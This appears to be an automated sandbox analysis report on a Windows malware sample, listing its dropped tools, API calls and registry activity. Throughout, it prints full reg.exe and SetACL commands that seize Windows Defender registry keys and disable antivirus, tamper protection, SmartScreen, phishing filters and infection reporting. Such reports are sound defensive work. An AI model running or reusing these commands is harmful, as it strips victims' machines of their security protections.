Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031F1
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F621B0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,GetLastError,FindCloseChangeNotification,GetLastError,CloseHandle,3_2_00F621B0
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsq9534.tmpJump to behavior
Source: classification engineClassification label: mal60.winEXE@143/12@0/0
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_004020CB CoCreateInstance,MultiByteToWideChar,0_2_004020CB
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_00404496 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404496
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F688E0 GetLastError,#13,SysStringByteLen,SysAllocStringByteLen,SysFreeString,LoadLibraryExW,LoadLibraryExW,FormatMessageW,LocalFree,FreeLibrary,_com_issue_error,_com_issue_error,3_2_00F688E0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F62720 FindResourceW,LoadResource,LockResource,FreeResource,3_2_00F62720
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\do32.bat
Source: SetACL32.exeString found in binary or memory: -help
Source: SetACL32.exeString found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL32.exeString found in binary or memory: Type 'SetACL -help' for help.
Source: Ptmhbplhxb.exeStatic file information: File size 3596632 > 1048576
Source: Ptmhbplhxb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdbI source: SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb source: SetACL32.exe, 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.337990441.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.339317693.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.338670172.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.340772925.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.339891186.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.341509192.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.340983275.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.341713280.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.342214867.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.342983342.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.342556211.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.343532858.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.344356019.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.345325623.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.344643979.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F8B546 push ecx; ret 3_2_00F8B559
Source: SetACL64.exe.0.drStatic PE information: section name: _RDATA

Persistence and Installation Behavior

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeFile created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeFile created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeJump to dropped file
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeFile created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exeJump to dropped file
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeFile created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exeJump to dropped file
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeFile created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL64.exeJump to dropped file
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeFile created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\gafvvkhmsfjamrm.exeJump to dropped file
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeFile created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun64.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F8AB5F GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00F8AB5F
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe TID: 1364Thread sleep count: 345 > 30Jump to behavior
Source: C:\Users\user\Desktop\Ptmhbplhxb.exe TID: 1364Thread sleep time: -34500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\pdzaicbnewkzt.exeJump to dropped file
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun.exeJump to dropped file
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL64.exeJump to dropped file
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\gafvvkhmsfjamrm.exeJump to dropped file
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\PowerRun64.exeJump to dropped file
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_00406268 FindFirstFileA,FindClose,0_2_00406268
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040572D
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F74BF0 std::locale::_Init,std::locale::_Init,FindFirstFileW,GetLastError,FindNextFileW,FindClose,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,std::locale::_Init,RegConnectRegistryW,RegOpenKeyExW,RegCreateKeyExW,RegCloseKey,RegCloseKey,3_2_00F74BF0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F840D0 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,3_2_00F840D0
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F9F7A1 FindFirstFileExW,3_2_00F9F7A1
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeAPI call chain: ExitProcess graph end nodegraph_0-3005
Source: SetACL32.exe, 00000004.00000002.339190489.0000000000C77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: SetACL32.exe, 00000009.00000002.343998236.00000000005C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
Source: SetACL32.exe, 00000003.00000002.338453577.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, SetACL32.exe, 00000005.00000002.340615033.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp, SetACL32.exe, 00000006.00000002.341373587.00000000009A7000.00000004.00000020.00020000.00000000.sdmp, SetACL32.exe, 00000007.00000002.342263578.0000000001307000.00000004.00000020.00020000.00000000.sdmp, SetACL32.exe, 0000000A.00000002.345165275.0000000000797000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SetACL32.exe, 00000008.00000002.343136700.00000000015C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F8F1A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00F8F1A3
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00FA0336 GetProcessHeap,3_2_00FA0336
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F9CB4E mov eax, dword ptr fs:[00000030h]3_2_00F9CB4E
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F96588 mov eax, dword ptr fs:[00000030h]3_2_00F96588
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F9CB92 mov eax, dword ptr fs:[00000030h]3_2_00F9CB92
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F8BB7C SetUnhandledExceptionFilter,3_2_00F8BB7C
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F8F1A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00F8F1A3
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F8B715 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00F8B715
Source: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exeCode function: 3_2_00F8BA19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00F8BA19
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user~1\AppData\Local\Temp\nsq9535.tmp\do32.batJump to behavior
Source: C:\Users\user\Desktop\Ptmhbplhxb.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsq9535.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
